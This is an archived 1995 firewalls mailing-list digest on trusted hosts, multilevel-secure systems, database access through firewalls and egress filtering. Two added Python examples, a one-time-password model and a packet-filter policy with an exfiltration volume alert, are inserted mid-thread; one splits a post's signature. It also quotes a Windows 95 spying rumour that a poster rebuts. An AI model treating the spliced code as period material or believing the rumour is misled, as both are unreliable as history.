Cc: firewalls@greatcircle.com
Subject: Re: sidewinder challenge
mulligan@future.incog.com writes:

>Just to be clear, it isn't Interop, but Connectithon. At Interop these
>days there seems to be nothing but marketing weenies and marketing hype.
>Connectithon only allows a single part of day for media and technical
>results ARE NOT published. Maybe we could see if we could do a firewall
>test-a-thon with Connectithon. If there is interest, I can ask the
>right folks in Sun.

How can I (we) help?

RayK 8)

- Better Living Through Authentication -
I usually only speak for myself
Ray Kaplan - Security Services - P.O. Box 23210 - Richfield, MN 55423
Phone / FAX (612) 861-7198 - currently: kaplan@bpa.arizona.edu
But, as with everything else in life, this will change.

From firewalls-owner Tue Aug 1 14:23:09 1995
Date: Tue, 1 Aug 1995 14:17:44 -0500
From: kaplan@bpa.arizona.edu (Ray Kaplan)
To: firewalls@greatcircle.com
Subject: Re: I open my big mouth... proxies for Oracle?

Ummm, at the risk of sounding like I've made firewalls my own private hang out... Wonder if anyone has used the various alternatives available in Oracle's security interface.
I hear that my ex-employer (CyberSAFE) is offering a Kerberos hook for what appears to be Oracle's generalized security interface?

RayK 8)

- Better Living Through Authentication -
I usually only speak for myself
Ray Kaplan - Security Services - P.O. Box 23210 - Richfield, MN 55423
Phone / FAX (612) 861-7198 - currently: kaplan@bpa.arizona.edu
But, as with everything else in life, this will change.

From firewalls-owner Tue Aug 1 14:43:10 1995
Date: Tue, 01 Aug 95 17:10:48 EST
From: jmeritt@smtpinet.aspensys.com (Meritt, Jim)
Cc: firewalls@greatcircle.com
Subject: Re: proving secure
Message-Id: <9507018073.AA807322248@smtpinet.aspensys.com>

Air gap works REAL well. But folks keep wanting unsecure stuff like "communications" at the same time. Ah well....
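The SecurID exchange earlier in this digest (Jeromie Jackson's question about what someone holding a card's seed and the algorithm could compute, and Vin McLellan's account of the drift window and the "next card display" double verify) is easier to reason about with a small model. The following is an added example; it is not code from any poster here nor from Security Dynamics. It stands in a generic HMAC-SHA1 one-time password for the proprietary card algorithm, with a constructed 60-second step, six-digit codes and a four-digit PIN; the class, function and user names are invented for the illustration. It shows why the seed is the secret that matters (the card display is a pure function of seed and time), why a skewed server clock produces denial of service rather than a false accept, and how the double-verify resync described in the thread works.

```python
import hashlib
import hmac
import struct

STEP_SECONDS = 60   # constructed: the card display rolls over once a minute
DIGITS = 6          # constructed: six-digit card code


def token_code(seed: bytes, counter: int) -> str:
    """Code for one time step: HMAC-SHA1 of the step counter under the card
    seed, with RFC 4226 dynamic truncation. This is a generic HMAC one-time
    password, NOT the SecurID card algorithm; it stands in for it because the
    property under discussion is the same: the code is a pure function of the
    card seed and the time, so whoever holds the seed can compute it."""
    mac = hmac.new(seed, struct.pack(">Q", counter), hashlib.sha1).digest()
    offset = mac[-1] & 0x0F
    truncated = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
    return f"{truncated % 10 ** DIGITS:0{DIGITS}d}"


def card_display(seed: bytes, card_clock: int) -> str:
    """What the card shows when its own clock reads card_clock (seconds)."""
    return token_code(seed, card_clock // STEP_SECONDS)


class OtpServer:
    """Server-side check (hypothetical, modelled on the thread's description):
    static PIN + card code, a +/-window drift tolerance, and the 'next card
    display' confirmation for logins that arrive while the clocks disagree."""

    def __init__(self, seeds: dict, pins: dict, window: int = 1):
        self.seeds = seeds          # user -> card seed; the secret that must never leave the server
        self.pins = pins            # user -> static PIN the user memorises
        self.window = window        # accepted clock drift, in steps, either side of "now"
        self.pending_next = {}      # user -> counter whose code must be shown next

    def verify(self, user: str, passcode: str, server_clock: int) -> str:
        seed, pin = self.seeds[user], self.pins[user]
        if (not passcode.isdigit() or len(passcode) != len(pin) + DIGITS
                or not hmac.compare_digest(passcode[:len(pin)], pin)):
            return "reject"
        code = passcode[len(pin):]
        now = server_clock // STEP_SECONDS

        # A user who logged in during clock drift must now show the following display.
        if user in self.pending_next:
            if hmac.compare_digest(code, token_code(seed, self.pending_next[user])):
                del self.pending_next[user]
                return "accept"
            return "reject"

        for drift in range(-self.window, self.window + 1):
            if hmac.compare_digest(code, token_code(seed, now + drift)):
                if drift == 0:
                    return "accept"
                # Clocks disagree by an allowed amount: do not trust this code alone,
                # ask for the next display before letting the user in.
                self.pending_next[user] = now + drift + 1
                return "next-code-required"
        # Outside the window (e.g. a badly skewed server clock): the legitimate
        # user is locked out, but no code from another time is ever accepted.
        return "reject"


def run_scenarios() -> dict:
    """Constructed scenarios; returns the verdicts so they can be checked."""
    seed = b"constructed-card-seed-0001"   # constructed; a real seed is per-card and secret
    t0 = 1_000_020                         # constructed card clock, exactly on a step boundary
    results = {}

    def fresh_server():
        return OtpServer({"alice": seed}, {"alice": "4321"}, window=1)

    # Card and server agree: normal login. A wrong PIN with the right card code fails.
    s = fresh_server()
    results["in_sync"] = s.verify("alice", "4321" + card_display(seed, t0), t0)
    results["bad_pin"] = s.verify("alice", "0000" + card_display(seed, t0), t0)

    # Server clock one step ahead (inside the window): the user must also
    # present the next card display before being let in.
    s = fresh_server()
    results["drift_first"] = s.verify("alice", "4321" + card_display(seed, t0), t0 + STEP_SECONDS)
    results["drift_next"] = s.verify("alice", "4321" + card_display(seed, t0 + STEP_SECONDS),
                                     t0 + 2 * STEP_SECONDS)

    # Server clock five minutes off (e.g. fed a bad time): denial of service, not a bypass.
    s = fresh_server()
    results["skewed"] = s.verify("alice", "4321" + card_display(seed, t0), t0 + 5 * STEP_SECONDS)
    return results


if __name__ == "__main__":
    print(run_scenarios())
```

The design point is the asymmetry Vin describes: a bad clock makes the server say "reject" or "show me the next code", never "accept" for a code from some other minute, while `card_display` makes Jeromie's concern concrete, since anyone who can call it with the real seed sees exactly what the card shows.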
From firewalls-owner Tue Aug 1 14:44:11 1995
Date: 01 Aug 1995 20:09:01 GMT
From: Gateway@BayNetworks.com (Gateway)
To: Firewalls@GreatCircle.COM
Subject: NDN: Firewalls-Digest V4 #455
Message-Id: <471728126.52609184@BayNetworks.com>

Sorry. Your message could not be delivered: Message contained no valid addresses.
From firewalls-owner Tue Aug 1 15:18:56 1995
Date: Tue, 01 Aug 1995 14:00:11 -0700
From: Craig Anderson
To: mulligan@incog.com
cc: Craig Anderson, mjr@iwi.com, ray@skypoint.com, firewalls@greatcircle.com, craiga@Ipsilon.COM
Subject: Re: sidewinder challenge
Message-Id: <199508012100.OAA17458@servo.ipsilon.com>
In-reply-to: Your message of "Mon, 31 Jul 1995 22:18:28 MDT." <9508010418.AA05240@future.incog.com>

Yes, Connectathon is what I meant (must have been a brain-fade).

All you guys in the industry should welcome this. There is entirely TOO much FUD in this business. That's why people want source code, because they can't trust a vendor. And it's awful hard to be the "only" trustworthy vendor. So you should figure out how to be trustworthy as a group. Publish who participated in the Firewall Connectathon and make it a gold star for those who do.

Come on folks, put up or shut up.

Craig Anderson

> > So how about doing the Firewall industry equivalent of the NFS industry's
> > week-long Inter-Op conference. No marketing weenies allowed, just technical
> > people from each participating vendor attacking each other's machines to
> > help improve the industry.
> > No technical results will be published.
> > If some vendor just wants free development help, don't help. Just
> > point out to each other the weaknesses found.
>
> Just to be clear, it isn't Interop, but Connectithon. At Interop these
> days there seems to be nothing but marketing weenies and marketing hype.
> Connectithon only allows a single part of day for media and technical
> results ARE NOT published. Maybe we could see if we could do a firewall
> test-a-thon with Connectithon. If there is interest, I can ask the
> right folks in Sun.
>
> geoff
>

From firewalls-owner Tue Aug 1 15:20:01 1995
Date: Tue, 1 Aug 95 16:11:45 EST
From: "Chris Brenton"
Subject: RE: multilevel security in firewalls
Message-Id: <9508011611.AA14296@herne.newsedge.com>

In reply to:
>
>Newbie alert!
>
>Okay, I've seen the term "trusted system" bantered around. Can
>someone give me a quick explanation of what a trusted system is?

A trusted system is *usually* another system you have identified (typically by IP address) to have access to your system without requiring a password. A good example would be if you have two systems (A&B) that you typically work off of and you are the only user of both systems, you may want to set each up as a "trusted host" to the other ("A" is trusted by "B" and "B" is trusted by "A").
This way you only have to login once and have access to both systems. The problem is if someone else "borrows" your IP address (say from system "A") they will be assumed to be a trusted system and have access (in this example to system "B") without requiring a password.

From firewalls-owner Tue Aug 1 15:21:03 1995
From: padgett@tccslr.dnet.mmc.com (A. Padgett Peterson, P.E. Information Security)
Date: Tue, 1 Aug 95 15:47:37 -0400
To: "firewalls@greatcircle.com"@UVS1.dnet.mmc.com
Subject: "Trusted Computers" (was re: multilevel security)
Message-Id: <9508011947.AA14107@uvs1.orl.mmc.com>

Garry writes:

> Okay, I've seen the term "trusted system" bantered around. Can
> someone give me a quick explanation of what a trusted system is?

Well it has a lot of meanings. In the red book (Trusted Network Interpretation, NCSC-TG-005) page 274 we find:

"Trusted computer system - a system that employs sufficient hardware and software integrity measures to allow its use for processing simultaneously a range of sensitive or classified information."

I tend to use "trusted hosts" and "trusted subnets" a bit differently:

"Those machines (or collection of machines on a subnet) which employ sufficient hardware, software, and trained personnel to be able to enforce the security policies of the Enterprise without other assistance."

"Trusted hosts" may only connect to a "trusted subnet" and all nodes on a "trusted subnet" must be "trusted".
For example, if a contract is let which requires RPC access to a program, then if another means cannot be found, a "trusted" subnet is created with a filtered connection to the internal net and the firewall is ACLed to allow connection from specific "untrusted" outside hosts to a "trusted" node on that subnet only.

"Trusted" nodes require a designated custodian who has received special training both on the node and on "trust" and are subject to unannounced monitoring/auditing. The rationale being that a properly equipped/maintained machine can be expected to enforce the security policies of the Enterprise as well as any device on the firewall.

This leads to the question of "what is an untrusted subnet?" and that is simply the "soft chewy center" of machines that are not expected to have to resist attack by themselves. Instead the firewall and internal filters/gateways are intended to provide that protection for the Enterprise or for individual nodes/nets/departments/projects. In B&C this role is handled by the bastion nodes.

In my worldview, good channeling, preparation, and administration (with accountability) can permit limited channels of access to specific nodes with minimal risk.
Warmly, Padgett

From firewalls-owner Tue Aug 1 15:22:07 1995
From: kaplan@bpa.arizona.edu (Ray Kaplan)
Date: Tue, 1 Aug 1995 14:18:15 -0500
To: mdr@vodka.sse.att.com
Cc: firewalls@greatcircle.com
Subject: Re: Using multilevel systems for firewalls

Mark Riggins mdr@vodka.sse.att.com writes:

> > > Re: Re: proving secure
> > > Mark writes:
> > > Okay, so labels and mandatory access control don't have much to do with
> > > building a firewall. But I wouldn't throw away my car just because I
> > > don't need four-wheel drive. Maybe it's time for an OS with high assurance
> > > and no labels?
>
> oops! you quoted Jeff Williams and attributed it to me. I disagree
> with Jeff's comment too.

Sorry, mailing list ineptitude at work.

> Firewalls inherently need separation policies to protect themselves
> from the network and applications software that they run.

Or, so it seems. Not being into the details of the math, it seems that something simple like set theory demands this.
> > 2) Most organizations are more interested in simply "getting that
> > connectivity going" than they are in doing
> > architecture/design/implementation that actually meets their security policy
> > (be it granular enough or not.) What I commonly hear: "Security? Yeah,
> > 'gimmie a little 'o that, will ya?"
>
> Sad but true. But the new push for connectivity to the internet may
> force companies to take a new look at host level security.

I keep hoping so. Wonder if it would do any good to canvass this list and make a press release signed by all who agree: "We, the assembled masses of firewall-interested netfolk, hereby declare that firewalls can't correct host security or organizational culture problems." We could make a press release and even quote SMB, et al ;)

RayK 8)
- Better Living Through Authentication - I usually only speak for myself
Ray Kaplan - Security Services - P.O. Box 23210 - Richfield, MN 55423
Phone / FAX (612) 861-7198 - currently: kaplan@bpa.arizona.edu
But, as with everything else in life, this will change.
From firewalls-owner Tue Aug 1 15:24:04 1995
From: kaplan@bpa.arizona.edu (Ray Kaplan)
Date: Tue, 1 Aug 1995 14:18:22 -0500
To: Ted Doty
Cc: firewalls@greatcircle.com
Subject: RE: Using multilevel systems for firewalls

Ted Doty writes:

> > So, I propose that anyone who is serious about mapping their infrastructure
> > across a network (especially a public network like the Internet) needs to
> > use multilevel systems - unless they only have one classification of data
> > that they don't care about. I've never seen such an organization - anyone
> > else?
>
> Ignoring MLS requirements that the commercial world consider silly (e.g.
> if you can't audit an event, shut down the device), this ignores the sad
> state of getting a product evaluated. Until the process at the NCSC
> changes substantially, it will continue to take companies 18 months to
> three years to get products certified.

Yep. And, with the various cut backs and noise from the commercial sector, it probably isn't going to get any easier.

> The result is that all certified products are obsolete. ;-)

Perhaps, by definition.
One interesting question is whether or not this is necessary to reach the goal of a trusted system. Consider that the only way we seem to know how to end up with something (anything) that works is to build it according to our best ideas, deploy it, and hack on it until it works! Maybe it has to work this way to end up with something that can actually be trusted?

> The European ITSEC seems to be taking a much more corporate-friendly
> approach to evaluations: companies hire organizations (CLEFs) that do the
> evaluation, rather than relying on a (free but overworked - and therefore
> slow) NCSC. Things seem to run much faster, with much lower risk for
> the corporation and (therefore) lower cost to the customers who buy the
> device.

Yes indeed. I have always wondered about getting into the "commercial system evaluation" business with some sort of simpler scheme that would test against the client's requirements. The problem has always been the HUGE amount of $ required to equip a lab. The labs that I see my clients using to test their client / server stuff before they deploy then start in the neighborhood of $1megabuck and have a staff of 10 wizards from various disciplines, plus a giazillion consultants available for piece work. Anyone got about $10mil loose that they can seed this with? ;)

RayK 8)
- Better Living Through Authentication - I usually only speak for myself
Ray Kaplan - Security Services - P.O. Box 23210 - Richfield, MN 55423
Phone / FAX (612) 861-7198 - currently: kaplan@bpa.arizona.edu
But, as with everything else in life, this will change.
From firewalls-owner Tue Aug 1 15:27:22 1995
From: kaplan@bpa.arizona.edu (Ray Kaplan)
Date: Tue, 1 Aug 1995 14:18:01 -0500
To: firewalls@greatcircle.com
Subject: Re: multilevel security in firewalls

Kate writes:

> Regarding CMW technology for possible use as a firewall, we discussed this
> in the lab at some length a while ago, and rejected the notion primarily
> because CMWs require the X Window System and because they don't support
> DNS.

re: DNS

Ummm, being in the middle of this darn OpenVMS / Digital UNIX / NT security feature comparison that is plaguing me, I pulled the latest PR from DEC on their MLS+ CMW from ftp.dec.com. NOW, I wonder how IP can work at all - perhaps with a trusted DNS? Anyone know? Pending time to go get the real details (which are to be found in the Software Product Description (SPD) at ftp.dec.com), here is what I found:

--Begin quote from DEC PR--

Digital Announces DEC MLS+ Release 3.1
Digital Increases Lead in Enterprise Security Solutions

AFCEA Conference, Washington, D.C.
-- June 6, 1995 -- Digital Equipment Corporation today announced DEC MLS+ version 3.1, the latest release of its trusted UNIX(R) operating system. Based on Digital UNIX, the trusted operating system provides a B1 Compartmented Mode Workstation (CMW) secure windowing and network environment for Digital's family of 64-bit Alpha client, workstation, server, and network platforms. The fifth-generation trusted release underlines Digital's commitment to address the security requirements of the enterprise MIS community.

DEC MLS+ 3.1 provides security enhancements to the Digital UNIX kernel, and includes security-enhanced versions of the industry standard OSF Motif V1.2.2 window manager and the X11 (R5) window server. Enhanced compatibility with mainstream Digital UNIX significantly increases the palette of Commercial-Off-The-Shelf (COTS) applications available for Digital's Alpha secure environments.

Built to enforce Bell-LaPadula mandatory access control - wherein users can neither read data that is above their authority level nor write data below their level - Digital's Multiple Level Secure - MLS product defines the state-of-the-art in enterprise security performance and usability. New features and functionality to version 3.1 include: support for trusted Network Information Services - NIS - full network security compliance to Trusted System Interoperability Group - TSIX (RE) 1.0, and configurable window security label display. Additionally, the fifth-generation product is based on Digital's current UNIX technology - a major contrast to competitors' less mature, second and third-generation security offerings, based on yesterday's first or second generation UNIX operating system offerings.

NIS: Administration and Management

Trusted NIS support provides the network administrator with an infrastructure to manage multiple trusted hosts across the network from a single host.
DEC MLS+ 3.1 allows the administrator to set and reset security attributes for multiple network system hosts, from assigning accreditation ranges to dictating communications protocols. Furthermore, 3.1's NIS functionality allows the administrator to replicate individual and macro security changes across all nodes on the network.

--End quote from DEC PR--

re: X on CMWs

But, it is a trusted X - meaning that it was re-written to conform to the rules of CMW (which are a superset of B - some C and some A level features). I thought that the whole reason to have a CMW WAS to do X?

RayK 8)
- Better Living Through Authentication - I usually only speak for myself
Ray Kaplan - Security Services - P.O. Box 23210 - Richfield, MN 55423
Phone / FAX (612) 861-7198 - currently: kaplan@bpa.arizona.edu
But, as with everything else in life, this will change.

From firewalls-owner Tue Aug 1 16:02:04 1995
From: Aramanuj@ens.com
Date: 01 Aug 95 15:24
To: firewalls@greatcircle.com
Subject: Firewall setup using SUN Netra i
Message-Id: <199508012213.PAA03991@radiomail.net>

Hi folks,

Has anyone set up a SUN Netra i as an internet server on a single port ethernet router (ex: CISCO 2501)? What are the implications if we use packet filtering at the router level as well as netra internal security?
Will this setup still be considered as a "single-point-of-compromise/failure"?

ps we are on a novell netware 3.12 and due to get in to the (IN)secure world of INTERNET!!

thanks in advance
arathy ram

From firewalls-owner Tue Aug 1 16:20:31 1995
From: Phil Trubey
Date: Tue, 1 Aug 1995 15:22:58 -0700 (PDT)
To: firewalls@greatcircle.com
Subject: Microsoft SQL Server on NT through firewall?

I know there has been some discussion here about Oracle's SQL*Net and how one would go about providing access to such a server through a firewall. Does anyone know if this is possible with Microsoft's SQL Server running on an NT machine? The Internet based client application will be using either dblib or ODBC calls to the network layer to access a server which will be on the protected side of the firewall. Does anyone know if MS SQL Server uses a static TCP port number for its server? Is any data including passwords encrypted?

---
Phil Trubey | NetPartners | Providing Internet products and services.
E-mail: phil@netpart.com | Home Page: http://www.netpart.com/
Phone: 619-622-8966 |

From firewalls-owner Tue Aug 1 16:34:45 1995
From: Brian Murrell
Date: Tue, 1 Aug 1995 15:29:38 -0700
To: darrell@teleport.com, sdw@lig.net
Cc: paul@rio.myra.com, firewalls@GreatCircle.COM
Subject: Re: Port 139 (netbios over TCP)
Message-Id: <199508012229.PAA15835@mocha.bctel.net>

> It's my current opinion that incoming ports should be blocked, but that
> the outgoing connection is ok. Does anyone disagree?

Hmmmm. Not only is the question debatable, but so is the answer. One could argue that limiting the outbound ports can help you detect trojans shipping sensitive data outside. Based on that, one could make a good argument for limiting outbound access by machines which have sensitive data on them.

However, if I were going to create a trojan I would have a server on my machine on port 80 which was waiting for the trojan to ship data to it. To the firewall, it would look like web access.

b.
--
Brian J. Murrell                    murrell@bctel.net
BCTel Advanced Communications       brian@ilinx.com
Vancouver, B.C.
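The packet-filter rules that Padgett's "Trusted Computers" post describes (specific outside hosts allowed to one trusted node on a trusted subnet, every node on that subnet trusted), the risk Chris Brenton raises (trust keyed to a source address is only as good as the address), and the egress question in Brian Murrell's post above, modelled together in one policy engine. This is an added illustration written for this page, not code from any of those posts or from any vendor product; the host names, RFC 5737 documentation addresses, ports and the 1,000,000-byte alert threshold are all constructed assumptions.

```python
"""Toy packet-filter policy: trusted-node ingress ACL, border anti-spoofing,
and an egress allow-list with a volume check for hosts holding sensitive data.
Added example; every address, name, port and threshold is constructed."""
from dataclasses import dataclass, field
from ipaddress import ip_address, ip_network


@dataclass(frozen=True)
class Host:
    name: str
    addr: str
    trusted: bool = False    # custodian assigned, hardened, audited
    sensitive: bool = False  # holds data whose egress must be restricted


@dataclass
class Subnet:
    name: str
    cidr: str
    trusted: bool = False
    hosts: list = field(default_factory=list)

    def contains(self, addr):
        return ip_address(addr) in ip_network(self.cidr)


@dataclass(frozen=True)
class Rule:
    src: str   # one specific host address
    dst: str   # one specific host address, or "any"
    port: int


class Firewall:
    EGRESS_BYTES_ALERT = 1_000_000  # assumed per-flow threshold for sensitive hosts

    def __init__(self, subnets, ingress, egress):
        self.subnets = list(subnets)
        self.ingress = set(ingress)
        self.egress = set(egress)
        self.log = []

    def subnet_of(self, addr):
        return next((s for s in self.subnets if s.contains(addr)), None)

    def host_at(self, addr):
        return next((h for s in self.subnets for h in s.hosts if h.addr == addr), None)

    def config_errors(self):
        """Placement rule: all nodes on a trusted subnet must be trusted."""
        return [f"{h.name}: untrusted node on trusted subnet {s.name}"
                for s in self.subnets if s.trusted
                for h in s.hosts if not h.trusted]

    def inbound(self, src, dst, port):
        """Verdict for a packet arriving on the outside interface."""
        if self.subnet_of(src) is not None:
            # An inside address can never legitimately arrive from outside;
            # the border is the only place address-based trust can be defended.
            self.log.append(f"SPOOF inside address {src} seen on outside interface")
            return "drop"
        net, host = self.subnet_of(dst), self.host_at(dst)
        if (Rule(src, dst, port) in self.ingress and net is not None
                and net.trusted and host is not None and host.trusted):
            return "accept"
        self.log.append(f"DENY in {src} -> {dst}/{port}")
        return "drop"

    def outbound(self, src, dst, port, nbytes):
        """Verdict for a flow leaving the inside.  Sensitive hosts get an
        allow-list plus a volume check, since port 80 alone looks like web."""
        host = self.host_at(src)
        if host is not None and host.sensitive:
            if Rule(src, "any", port) not in self.egress:
                self.log.append(f"DENY out {host.name} -> {dst}/{port}")
                return "drop"
            if nbytes > self.EGRESS_BYTES_ALERT:
                self.log.append(f"ALERT {host.name} sent {nbytes} bytes to {dst}/{port}")
                return "accept-alert"
        return "accept"


def build_sample():
    """Constructed topology: one trusted RPC subnet, one soft-center subnet."""
    rpc_dmz = Subnet("rpc-dmz", "192.0.2.0/28", trusted=True,
                     hosts=[Host("rpcgw", "192.0.2.5", trusted=True)])
    inside = Subnet("inside", "10.0.0.0/8",
                    hosts=[Host("desk1", "10.1.1.7"),
                           Host("payroll", "10.2.0.9", sensitive=True)])
    ingress = [Rule("198.51.100.20", "192.0.2.5", 111)]  # contractor -> rpcgw only
    egress = [Rule("10.2.0.9", "any", 25)]               # payroll may only send mail
    return Firewall([rpc_dmz, inside], ingress, egress)


def run_checks():
    fw = build_sample()
    verdicts = {
        "contractor to rpcgw/111": fw.inbound("198.51.100.20", "192.0.2.5", 111),
        "contractor to rpcgw/23": fw.inbound("198.51.100.20", "192.0.2.5", 23),
        "contractor into soft center": fw.inbound("198.51.100.20", "10.1.1.7", 111),
        "borrowed inside address": fw.inbound("10.1.1.7", "192.0.2.5", 111),
        "desk1 web": fw.outbound("10.1.1.7", "203.0.113.4", 80, 40_000),
        "payroll web": fw.outbound("10.2.0.9", "203.0.113.4", 80, 40_000),
        "payroll mail, bulk": fw.outbound("10.2.0.9", "203.0.113.4", 25, 5_000_000),
    }
    bad = build_sample()
    bad.subnets[0].hosts.append(Host("scratch", "192.0.2.9"))  # violates placement rule
    return fw.config_errors(), bad.config_errors(), verdicts, fw.log
```

`run_checks()` returns the configuration errors for a correct and a broken topology, the per-packet verdicts, and the log. The anti-spoof test is the only border defence this model offers for address-based trust: once a borrowed address is already on the inside, nothing in the filter can tell the two machines apart, which is Brenton's point. The volume check is a heuristic that flags, rather than proves, exfiltration over a permitted port.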
brian@wimsey.com                    604 454 5262

From firewalls-owner Tue Aug 1 16:42:07 1995
From: Ian Cooper
Date: Wed, 2 Aug 1995 00:30:19 +0000 (GMT)
To: firewalls@greatcircle.com
Subject: Re: NetSp wins Trust Award
In-Reply-To: <9508012027.AA4464@notes.mdor.state.mn.us> from "Eric Pederson" at Aug 1, 95 01:26:41 pm

> The following information was forwarded to me by pro-IBM guy. I'd appreciate
> comments from the list on both NetSP and the relevance of the announcement.

Oddly enough, there are at least two products within IBM that I am aware of that share the name NetSP:

- The NetSP Secured Logon Coordinator
- The NetSP Secured Network Gateway

The product referenced in the excerpt below is the former, while the firewall sometimes discussed on this list is the latter of the two. Accordingly, the announcement has no relevance whatsoever.

> --------
> SOMERS, N.Y., July 31, 1995--IBM's Resource Access Control Facility
> (RACF) and NetSP Secured Logon Coordinator were recently named as
> winners in two categories of the InfoSecurity News Readers' Trust
> Awards.
>
> The magazine's readers selected NetSP as the best network security
> product and RACF as the best platform security product in the awards
> announced in the May/June issue. Readers were asked to choose which
> product in each of 16 categories they trust the most.
> "These awards represent the opinions of information-security
> professionals who use these products in real-life situations," said
> Michael I. Sobol, InfoSecurity News publisher. "Our 28,000 readers
> know more about the technology and the products than anyone. These are
> the first awards to give the real experts in information security--our
> readers--a chance to name their favorite products."

--
Ian Cooper                              Internet: ian@oms.co.za
Open Mind Solutions                     Tel: +27 083 253-9865
Open Systems and Network Specialists

From firewalls-owner Tue Aug 1 17:00:31 1995
From: Ian Cooper
Date: Wed, 2 Aug 1995 00:27:52 +0000 (GMT)
To: Eric_Pederson.RISD@notes.mdor.state.mn.us (Eric Pederson)
Cc: firewalls@greatcircle.com
Subject: Re: NetSp wins Trust Award
In-Reply-To: <9508012027.AA4464@notes.mdor.state.mn.us> from "Eric Pederson" at Aug 1, 95 01:26:41 pm

> The following information was forwarded to me by pro-IBM guy. I'd appreciate
> comments from the list on both NetSP and the relevance of the announcement.

Oddly enough, there are at least two distinct products within IBM that I am aware of that share the name NetSP:

- The NetSP Secured Logon Coordinator
- The NetSP Secured Network Gateway

The product referenced in the excerpt below is the former, while the firewall sometimes discussed on this list is the latter of the two.
Accordingly, the announcement has no relevance whatsoever.

> --------
> SOMERS, N.Y., July 31, 1995--IBM's Resource Access Control Facility
> (RACF) and NetSP Secured Logon Coordinator were recently named as
> winners in two categories of the InfoSecurity News Readers' Trust
> Awards.
>
> The magazine's readers selected NetSP as the best network security
> product and RACF as the best platform security product in the awards
> announced in the May/June issue. Readers were asked to choose which
> product in each of 16 categories they trust the most.
>
> "These awards represent the opinions of information-security
> professionals who use these products in real-life situations," said
> Michael I. Sobol, InfoSecurity News publisher. "Our 28,000 readers
> know more about the technology and the products than anyone. These are
> the first awards to give the real experts in information security--our
> readers--a chance to name their favorite products."

--
Ian Cooper                              Internet: ian@oms.co.za
Open Mind Solutions                     Tel: +27 083 253-9865
Open Systems and Network Specialists

From firewalls-owner Tue Aug 1 17:25:11 1995
From: Larry Barras
Date: Tue, 01 Aug 1995 17:28:14 -0600
To: sjs@sunthing.sjsinc.com (Stefan Jon Silverman)
Cc: firewalls@GreatCircle.COM
Subject: Re: Huge gaping hole in Win95
Message-Id: <199508012205.RAA26128@igate.merakusa.com>

> Subject: Windows 95 Warning on comp.risks [RISKS-17.13], in Information Week
>
> Microsoft officials confirm that beta versions of Windows 95 include a small
> viral routine called Registration Wizard. It interrogates every system on a
> network gathering intelligence on what software is being run on which
> machine.

This is old FUD. Like most FUD, it's based on a mis-perception of the truth. The online registration program asks if you want to include information on your hardware and software along with registering your W95 upgrade. It shows you what it is collecting and sending. The information is the same stuff you can fill in on a registration postcard. It just automates the process. I personally click no, and leave post cards blank, thank you very much.

> - "*user*" fires up MS-Network which then transmits the
> entire corporate filesystem topology to MicroSoft.
>
> - security types never know that internal information has
> been severely compromised.

No, it won't happen. Think about it. Even if it were true, how long would it take for a single PC to navigate and discover your entire corporate file system? How long would it take to transmit that info by 14.4 or 28.8 modem? More than a second or two, I would suspect.

> 3). Am I wrong here??? I find the potential for this scenario
> both realistic and horrifying!!!!

Congratulations. You've been successfully fuddified.

[not Stefan's comment, snipped from usenet post]
> So spread the word as far and wide as possible: Steer clear of Windows 95.

Plenty of reasons to do this that are based on the truth, not nonsense. I personally choose Macintosh for my own computing. (this is a whole 'nother animal, and yeah I feel weird being on Microsoft's side.) Windows 95 presents a significantly *improved* security profile over DOS/Windows.
Since practically everyone has to deal with offices littered with Wintel boxes, I'd think even a minimal security system would be a welcome relief.

> Subject: Windows 95 Warning on comp.risks [RISKS-17.13], in Information Week
>
> Microsoft officials confirm that beta versions of Windows 95 include a small
> viral routine called Registration Wizard. It interrogates every system on a
> network gathering intelligence on what software is being run on which
> machine.

At 11:33 AM 8/1/95 -0700, Stefan Jon Silverman wrote:
> Folks:
>
> 1). Please see the posting below my sig line from comp.risks
>
> 2). I can imagine the following scenario:
>
> - "*user*" thrilled with his new upgrade to Win95 runs out
> to Fry's, Egghead...and buys a modem unbeknownst to the
> security types.
>
> - computer is also running a TCP/IP stack and PCNFS to
> access all of the corporate resources behind the firewall.
>
> - "*user*" fires up MS-Network which then transmits the
> entire corporate filesystem topology to MicroSoft.
>
> - security types never know that internal information has
> been severely compromised.
>
> 3). Am I wrong here??? I find the potential for this scenario
> both realistic and horrifying!!!!
>
> 4). In addition to the security implications, this might actually
> be a way to tame the MS beast...if enough corporations get
> probed in this manner, the lawyers will have lots of fun
> putting together a class-action lawsuit to make MS (the
> original home of proprietary information and disclosures)
> much, much poorer for stealing trade secrets, copyrights,
> etc....ALAS...I love it....
>
> 5). I think this also has implications for the MS TCP/IP port
> discussion that has been going on on this list recently.
> I.e., as the article points out, if they have your filesystem
> structure and you are not blocking that port, they could
> grab any file that they want and you would never know it...
>
> Regards,
>
> b c++'ing u,
>
> %-) sjs
>
> -------------------------------------------------------------------------------
> Stefan Jon Silverman - President                   SJS Associates, N.A., Inc.
>                                                    572 Chestnut Street
> Distributed Systems Architecture & Implementation  San Francisco, Ca. 94133
>                                                    Phone: 415 989 2741
> E-mail: sjs@sjsinc.com                             Cell: 415 519 3494
> -------------------------------------------------------------------------------
>                  Weebles wobble, but they don't fall down!!!
> -------------------------------------------------------------------------------
>
> Date: 30 Jun 1995 07:47:48 U
> From: "Paul Saffo"
> Subject: Warning on Using Win95
>
> >From PLS_MCI_MAIL FWD>>Warning on Using Win95
>
> Date: 6/26/95 8:44 PM
> From: jbreyer@accel.com
> Subject: Warning on Using Win95 [Update on RISKS-17.13 item]
>
> Believe it or not, this is not Net humor but serious. It would otherwise
> be outstanding satire!
>
> Subject: Windows 95 Warning on comp.risks [RISKS-17.13], in Information Week
>
> Microsoft officials confirm that beta versions of Windows 95 include a small
> viral routine called Registration Wizard. It interrogates every system on a
> network gathering intelligence on what software is being run on which
> machine. It then creates a complete listing of both Microsoft's and
> competitors' products by machine, which it reports to Microsoft when
> customers sign up for Microsoft's Network Services, due for launch later
> this year.
>
> "In Short" column, page 88, _Information Week_ magazine, May 22, 1995. The
> implications of this action, and the attitude of Microsoft to plan such
> action, beggars the imagination.
>
> An update on this. A friend of mine got hold of the beta test CD of Win95,
> and set up a packet sniffer between his serial port and the modem. When you
> try out the free demo time on The Microsoft Network, it transmits your
> entire directory structure in background.
>
> This means that they have a list of every directory (and, potentially every
> file) on your machine.
> It would not be difficult to have something like a
> FileRequest from your system to theirs, without you knowing about it. This
> way they could get ahold of any juicy routines you've written yourself and
> claim them as their own if you don't have them copyrighted.
>
> Needless to say, I'm rather annoyed about this.
> So spread the word as far and wide as possible: Steer clear of Windows 95.
>
> There's nothing to say that this "feature" will be removed in the final
> release.
>
